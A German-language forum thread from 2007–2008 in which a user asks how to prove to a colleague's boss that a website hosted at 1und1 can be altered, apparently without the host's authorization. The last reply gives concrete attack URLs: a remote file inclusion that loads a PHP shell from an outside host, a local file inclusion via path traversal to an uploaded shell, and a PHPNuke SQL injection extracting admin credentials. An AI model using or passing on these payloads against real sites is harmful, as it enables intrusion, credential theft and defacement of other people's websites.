GCF-Board

Registrieren || Einloggen || Hilfe/FAQ || Suche || Memberlist || Home || Statistik || Kalender || Staff Willkommen Gast!

GCF-Board » Security » ProFTPD Pass Buffer Overflow oder ne andere möglichkeit? » Threadansicht

Autor Thread - Seiten: -1-
000
22.08.2007, 14:12 Uhr
Pascal80

Foren Neuling


Servus,
also ne ganz dumme Situation...
ich hatte mit nem Kollegen gesprochen und irgendwie kamen wir auf das Thema Webpräsenzsicherheit. Ich habe Ihm gesagt das es grundsätlich möglcih ist die Webseiten zu verändern (kommt halt drauf an...) Jetzt hat er dies aber auch so seinem Chef gesagt und der möchte dies natürlich auch bewiesen haben. das Problem ist das er keinen eigenen Server hat und seine Präsenz bei 1und1 liegt. Ich habe mal mit dem "ATK" einen Audit gemacht und 50 vulnerabilities gefunden wobei 5 Kritisch waren. Der Chef von meinem Kollegen meinte das wir dann sein Bild gegen das eines anderen Mitarbeiters tauschen sollten. Die Vulnerabilities enden aber meistens mit nem D.O.S. so auch der ProFTPD Pass Buffer Overflow und da dies ein Server von 1und1 ist und da auch andere Kundendaten liegen möchte / werde ich diesen Server nicht angreifen.

Gibt es noch eine elegante Möglichkeit dies zu tun?
Auf der HP laufen keine Skripte oder dergleichen.

Und ich möchte auch anmerken das dadurch weder seine noch ander Internetpräsenzen gefährdet werden dürfen.

Habt Ihr irgendwelche Vorschläge / Lösungen?

Danke
Seitenanfang Seitenende
Profil || Private Message || Suche Zitatantwort || Editieren || Löschen || IP
001
22.08.2007, 20:21 Uhr
ToP-PaPPa
Der, der den Hammer schwingt
Foren Papst


Keine, die nicht gegen das neue Anti-Hacker-Gesetz verstossen würde... Wenn auf der HP keine weiteren Skript laufen, ist da eh nicht viel zu machen...
--
If minds had anuses, blogging would be what your mind would do when it had to take a dump.
Seitenanfang Seitenende
Profil || Private Message || Suche Zitatantwort || Editieren || Löschen || IP
002
20.02.2008, 10:45 Uhr
Markus Reisser

Foren Neuling


Hallo,

also sagen wir es mal so: möglich wäre schon einiges, es kommt eben auf die Website an... Nehmen wir mal an, dass die Website PHP Code enthält... Daten in einer Datenbank gespeichert werden (Username, Passwort usw - z.B. wegen einem Login Script) dann könnte man doch nach folgenden Lücken suchen...

RFI (darüber z.B. eine PHP Shell einbinden) - Du könntest die Daten frei verändern, sofern du Schreibrechte hast. Wenn der Server z.B. auch noch im SafeMode läuft, naja dann musst Dir halt was einfallen lassen, aber dazu werde ich nichts sagen!

Ein Beispiel von Tropicalm Crowell Resource:

http://foo_bar/path/printfriendly.php?RESPATH=http://deine_website/php_shell.php


LFI (ein locales File einbinden) - Du könntest eine Datei auf den Server laden und diese dann ausführen (z.B. eine PHP Shell).

Ein Beispiel von Mini File Host:

http://foo_bar/Path/pages/upload.php?language=../../../../../var/www/apache2-default/homepage/images/php_shell.php

SQL Injection - naja könntest dir evtl die Userdaten des Admins holen und ich über diesen einloggen (entweder per Cookie HighJacking oder eben den PW Hash cracken). Wenn du drin bist, egal auf welche Art und Weise, kannst du vllt Daten an der Homepage ändern... Oder dich vllt mit dem gleichen Passwort in den ProFTPd einloggen....

Ein Beispiel von PHPNuke:

http://foo_bar/path/modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

Naja viele Wege, kommt halt drauf an, ob die HP sowas hergibt. Mehr sage ich dazu aber nicht, Links oder ähnliches gebe ich auch nicht Preis, da das dann wohl sehr fahrlässig von mir wäre. Wenn du deisbezüglich Fragen hast oder Interesse hegst, dann suche einfach im WWW Da findest du mit sicherhiet viel viel viel

Mfg Markus Reisser
Seitenanfang Seitenende
Profil || Private Message || Suche Zitatantwort || Editieren || Löschen || IP
Seiten: -1-     [ Security ]  



German Computer Freaks

powered by ThWboard 3 Beta 2.85-rc3
© by Paul Baecher & Felix Gonschorek